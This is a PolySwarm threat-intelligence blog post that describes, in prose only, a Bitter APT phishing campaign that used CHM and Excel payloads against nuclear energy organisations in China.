The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Bitter APT Campaign Targets Energy Sector

Apr 10, 2023 1:22:19 PM / by The Hivemind

bitterAPT Verticals Targeted: Energy

Executive Summary

A recent Bitter APT campaign targeted nuclear energy entities in China. The threat actors used multiple techniques to obtain access to the victim machine, maintain persistence, and download and execute next-stage payloads.

Key Takeaways

  • Bitter APT recently launched an espionage campaign targeting energy sector entities in China.
  • The threat actors used a phishing lure masquerading as a conference invitation from an embassy attache.
  • The threat actors used both CHM and Excel payloads and employed multiple techniques in an attempt to evade detection and analysis. 

The Campaign

Intezer recently reported on a Bitter APT campaign targeting nuclear energy entities in China. The threat actors engaged targets with a phishing campaign, with lures pretending to be from the Embassy of Kyrgyzstan in Beijing, inviting the recipient to join a conference related to their field. The emails have an attached RAR file containing a CHM or Excel payload. The email is meant to entice the intended victim into opening the RAR file. To add a sense of legitimacy to the email, the threat actors used the name of an actual attache at the embassy.

In the campaign, the threat actors used multiple malicious payloads, which were compressed into RAR files. The payloads are intended to maintain persistence in the victim network and download additional malware payloads.

The Excel payloads use an Equation Editor exploit to create two scheduled tasks: one used to download the next stage payload and another to attempt to execute the newly downloaded payload.

The CHM files, associated with Microsoft Compiled HTML Help, are used to execute arbitrary code and to create scheduled tasks. This allows the threat actor to obtain persistence on the victim machine, with very little user interaction required to initiate the infection. Additionally, the CHM files use LZX compression, allowing them to bypass static malware analysis if the file is not decompressed. One version of the CHM file creates a scheduled task that uses msiexec, a living-off-the-land binary (LoLBin), to execute a remote MSI payload hosted on the C2. Another version of the CHM payload performs similar activity using an encoded PowerShell command stage.

Who is Bitter APT?

Bitter APT is a threat actor group thought to operate out of South Asia. The group primarily engages in espionage campaigns. Bitter APT has previously targeted government and energy sector entities in Pakistan, China, Saudi Arabia, and Bangladesh.


PolySwarm has multiple samples associated with this campaign.








You can use the following CLI command to search for all Bitter APT samples in our portal:

$ polyswarm link list -f BitterAPT

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.

Contact us at | Check out our blog | Subscribe to our reports

Topics: Threat Bulletin, China, Energy, South Asia, Bitter APT, Nuclear

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts